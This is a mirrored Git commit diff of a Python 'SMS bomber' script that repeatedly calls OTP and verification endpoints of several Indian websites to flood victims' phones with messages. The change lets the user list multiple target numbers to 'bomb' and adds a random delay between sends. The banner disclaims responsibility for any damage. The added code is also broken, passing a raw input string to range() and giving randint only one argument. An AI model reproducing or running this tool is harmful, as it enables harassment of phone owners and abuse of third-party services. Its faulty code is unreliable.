mirror of
https://github.com/bhattsameer/Bombers.git
synced 2023-08-10 21:12:53 +03:00
commit
3faea40a71
@ -3,6 +3,7 @@ from urllib.parse import urlencode
|
|||||||
import platform
|
import platform
|
||||||
import os
|
import os
|
||||||
import time
|
import time
|
||||||
|
from random import randint
|
||||||
|
|
||||||
def banner():
|
def banner():
|
||||||
if platform.system().lower()=="windows":
|
if platform.system().lower()=="windows":
|
||||||
@ -21,6 +22,7 @@ def banner():
|
|||||||
\______/ |__/ |__/ \______/ |_______/ \______/ |__/ |__/|_______/ |________/|__/ |__/
|
\______/ |__/ |__/ \______/ |_______/ \______/ |__/ |__/|_______/ |________/|__/ |__/
|
||||||
|
|
||||||
By : D3XBugg3R
|
By : D3XBugg3R
|
||||||
|
Modded By: Lucas
|
||||||
With <3 of T34M GCA
|
With <3 of T34M GCA
|
||||||
Note : I won't be responsible for any damage caused by this script, Use at your own risk
|
Note : I won't be responsible for any damage caused by this script, Use at your own risk
|
||||||
""")
|
""")
|
||||||
@ -33,6 +35,13 @@ def banner():
|
|||||||
#http://www.quikr.com/SignIn?aj=1&for=send_otp&user=
|
#http://www.quikr.com/SignIn?aj=1&for=send_otp&user=
|
||||||
|
|
||||||
#https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=
|
#https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=
|
||||||
|
|
||||||
|
how_many = input("How many numbers do you want to bomb? ")
|
||||||
|
numbers = []
|
||||||
|
for i in range(how_many):
|
||||||
|
temp = str(input(f"Enter the number {i+1}: "))
|
||||||
|
numbers.append(temp)
|
||||||
|
|
||||||
def send(num, counter, slep):
|
def send(num, counter, slep):
|
||||||
#url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="]
|
#url = ["https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=","https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile=","https://t.justdial.com/api/india_api_write/10aug2016/sendvcode.php?mobile="]
|
||||||
url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile="
|
url="https://m.naaptol.com/faces/jsp/ajax/ajax.jsp?actionname=checkMobileUserExists&mobile="
|
||||||
@ -47,7 +56,8 @@ def send(num, counter, slep):
|
|||||||
time.sleep(slep)
|
time.sleep(slep)
|
||||||
try:
|
try:
|
||||||
banner()
|
banner()
|
||||||
send(input("Enter Target Number : "), int(input("Enter Number of Messages : ")), 1)
|
for number in numbers:
|
||||||
|
send(number, int(input(f"Enter Number of Messages for {number} : ")), randint(3))
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print("Something is wrong please Re-run this script.")
|
print("Something is wrong please Re-run this script.")
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user